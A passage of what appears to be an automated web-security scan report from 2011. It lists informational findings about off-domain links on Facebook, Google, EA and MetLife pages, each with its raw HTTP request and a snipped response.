Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.216.41
X-Cnection: close
Date: Fri, 24 Jun 2011 13:32:35 GMT
Content-Length: 9136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/6KGjlCsCWCK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/6S8W9-zcvGH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/AppStore" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg" alt="App Store" /></a>
...[SNIP]...
18.41. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.177.32
X-Cnection: close
Date: Fri, 24 Jun 2011 13:27:59 GMT
Content-Length: 9128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/6KGjlCsCWCK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/6S8W9-zcvGH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/iTunes" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50276_100484820802_1716483_q.jpg" alt="iTunes" /></a>
...[SNIP]...
18.42. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?hl=en&q=Spilgames+Internet HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 90706

<!doctype html> <head> <title>Spilgames Internet - Google Search</title> <script>window.google={kEI:"cpAETrL6MILY0QHM4tjaCw",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29561,29702,2
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&q=Spilgames+Internet&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.prweb.com/releases/2011/02/prweb5046784.htm" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHht-Je4kFJQ-ODSld4E5CnnpCBAQ','','0CDoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Wp_syiN1xfEJ:www.prweb.com/releases/2011/02/prweb5046784.htm+Spilgames+Internet&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNFn1Ctex0w0OueurOyoIvzrjJyECw','','0CD8QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/" class=l onmousedown="return rwt(this,'','','','2','AFQjCNGTQU5fLAn8tfYfsFi1PBpiKzvhsA','','0CEAQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0FNfuTLfIHgJ:www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/+Spilgames+Internet&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNGtbr8ZKn3cfIOFP5fSiUhvRBZiMw','','0CEUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNE13Ctpn6tMPYCz3ocuT23QIxt1zw','','0CEYQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:98CjJrpIcRsJ:www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/+Spilgames+Internet&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNGTNq1AVoGTbdJCvRxHUpCF3-wjDA','','0CEsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://internetgames.about.com/od/casualgames/a/Spil-State-Of-Casual-Gaming.htm" class=l onmousedown="return rwt(this,'','','','4','AFQjCNEnsUbGntrZEzAe-VOKJxv-wUVwmA','','0CEwQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JO0LVL1orLAJ:internetgames.about.com/od/casualgames/a/Spil-State-Of-Casual-Gaming.htm+Spilgames+Internet&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNHQQs8gkxlOHFqqmbA5b08I5RN4nA','','0CFEQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html" class=l onmousedown="return rwt(this,'','','','5','AFQjCNHQDqkywOHnHtaVw0xtEl6gpiXu1Q','','0CFIQFjAE')">GDN: 40% of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EbUAXf9ybMIJ:www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html+Spilgames+Internet&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNHFzepNz0nwocBUV885nI9RpjoXEg','','0CFcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/" class=l onmousedown="return rwt(this,'','','','6','AFQjCNH5WNWfDUoqLU8afdRaktG2U42Fvg','','0CFgQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rVIMYW7QDTYJ:article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/+Spilgames+Internet&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNH5pnBn64XYb8uAMoXm2sBaLdqi0g','','0CF0QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174" class=l onmousedown="return rwt(this,'','','','7','AFQjCNE5lcW2j6-vKkd0-k-Zqa9HS-TVzw','','0CF4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:eSEkUWMnnV0J:www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174+Spilgames+Internet&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNFOgABFIiR6g60PKgp4Qy7s6mpijQ','','0CGMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fupa.com/games/1/spil-games.html" class=l onmousedown="return rwt(this,'','','','8','AFQjCNGd-QVldmqXN-69sK-7bmPTl_c7uA','','0CGQQFjAH')">Free Online <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fUy24RQRRS4J:www.fupa.com/games/1/spil-games.html+Spilgames+Internet&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNFU1NAdfZew6Y2OEo9LiDNgzdwrHg','','0CGkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gamersbook.com/scene/developer-spotlight/40-of-all-internet-users-play-online-games/" class=l onmousedown="return rwt(this,'','','','9','AFQjCNGHGmDYYapvuhl3tm8kqSgSOOk6ng','','0CGoQFjAI')">40% of All <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ciFjPF1ijOMJ:www.gamersbook.com/scene/developer-spotlight/40-of-all-internet-users-play-online-games/+Spilgames+Internet&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNE6iyJmatke97UmdJue59_VPldqdA','','0CG8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/groups/Spil-Games-Selects-Adyens-Internet-1909783.S.43081849?qid=ddea9619-59e8-4df3-8277-ac8f2b966a8a&amp;goback=.gmp_1909783" class=l onmousedown="return rwt(this,'','','','10','AFQjCNFxlqtbwvx_OfTS09jm01IuPm-BZw','','0CHAQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OvFvjEIwtHYJ:www.linkedin.com/groups/Spil-Games-Selects-Adyens-Internet-1909783.S.43081849%3Fqid%3Dddea9619-59e8-4df3-8277-ac8f2b966a8a%26goback%3D.gmp_1909783+Spilgames+Internet&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNHXPIGqh72C16UtEa3jtqSrMdftlA','','0CHUQIDAJ')">Cached</a>
...[SNIP]...
18.43. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=https%3A%2F%2F174.36.18.902006%2FWizard%2FStart%3FsiteId%3D92907014f563ac53317555e74a1a1a26 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:02:41 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 72298

<!doctype html> <head> <title>https://174.36.18.902006/Wizard/Start?siteId=92907014f563ac53317555e74a1a1a26 - Google Search</title> <script>window.google={kEI:"wUEFTufUG-ra0QHqkr2GCw",kEXPI:"17
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=https://174.36.18.902006/Wizard/Start%3FsiteId%3D92907014f563ac53317555e74a1a1a26&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
18.44. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=7&ved=0CF4QFjAG&url=http%3A%2F%2Fwww.silobreaker.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174&ei=cpAETrL6MILY0QHM4tjaCw&usg=AFQjCNE5lcW2j6-vKkd0-k-Zqa9HS-TVzw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 302 Found
Location: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 13:26:45 GMT
Server: gws
Content-Length: 313
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174">here</A>
...[SNIP]...
18.45. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CEAQFjAB&url=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2F&ei=cpAETrL6MILY0QHM4tjaCw&usg=AFQjCNGTQU5fLAn8tfYfsFi1PBpiKzvhsA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 302 Found
Location: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 13:26:30 GMT
Server: gws
Content-Length: 318
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/">here</A>
...[SNIP]...
18.46. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=5&ved=0CFIQFjAE&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&ei=cpAETrL6MILY0QHM4tjaCw&usg=AFQjCNHQDqkywOHnHtaVw0xtEl6gpiXu1Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 302 Found
Location: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 13:26:35 GMT
Server: gws
Content-Length: 293
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html">here</A>
...[SNIP]...
18.47. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CEYQFjAC&url=http%3A%2F%2Fwww.redorbit.com%2Fnews%2Fbusiness%2F1993118%2Fspil_games_selects_adyens_internet_payment_system_for_global_social%2F&ei=cpAETrL6MILY0QHM4tjaCw&usg=AFQjCNE13Ctpn6tMPYCz3ocuT23QIxt1zw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 302 Found
Location: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 13:26:33 GMT
Server: gws
Content-Length: 311
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/">here</A>
...[SNIP]...
18.48. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=6&ved=0CFgQFjAF&url=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&ei=cpAETrL6MILY0QHM4tjaCw&usg=AFQjCNH5WNWfDUoqLU8afdRaktG2U42Fvg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 302 Found
Location: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 13:26:45 GMT
Server: gws
Content-Length: 296
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/">here</A>
...[SNIP]...
18.49. http://www.info.ea.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.ea.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?pageSection=footer_corpinfo HTTP/1.1
Host: www.info.ea.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 24 Jun 2011 13:43:12 GMT
Content-Type: text/html; Charset=UTF-8
Expires: Fri, 24 Jun 2011 13:43:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30991


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>EA Press</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="tex
...[SNIP]...
<font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.businesswire.com/portal/site/ea/index.jsp?ndmViewId=news_view&ndmConfigId=1012492&newsId=20110622007026&newsLang=en"><img src="images/read.png" width="38" height="14" border="0">
...[SNIP]...
<font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.businesswire.com/portal/site/ea/index.jsp?ndmViewId=news_view&ndmConfigId=1012492&newsId=20110621005256&newsLang=en"><img src="images/read.png" width="38" height="14" border="0">
...[SNIP]...
<font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.businesswire.com/portal/site/ea/index.jsp?ndmViewId=news_view&ndmConfigId=1012492&newsId=20110614006457&newsLang=en"><img src="images/read.png" width="38" height="14" border="0">
...[SNIP]...
<font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.businesswire.com/portal/site/ea/index.jsp?ndmViewId=news_view&ndmConfigId=1012492&newsId=20110607007181&newsLang=en"><img src="images/read.png" width="38" height="14" border="0">
...[SNIP]...
<font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.businesswire.com/portal/site/ea/index.jsp?ndmViewId=news_view&ndmConfigId=1012492&newsId=20110607006028&newsLang=en"><img src="images/read.png" width="38" height="14" border="0">
...[SNIP]...
18.50. http://www.metlife.com/about/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /about/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /about/index.html?WT.ac=GN_about HTTP/1.1
Host: www.metlife.com
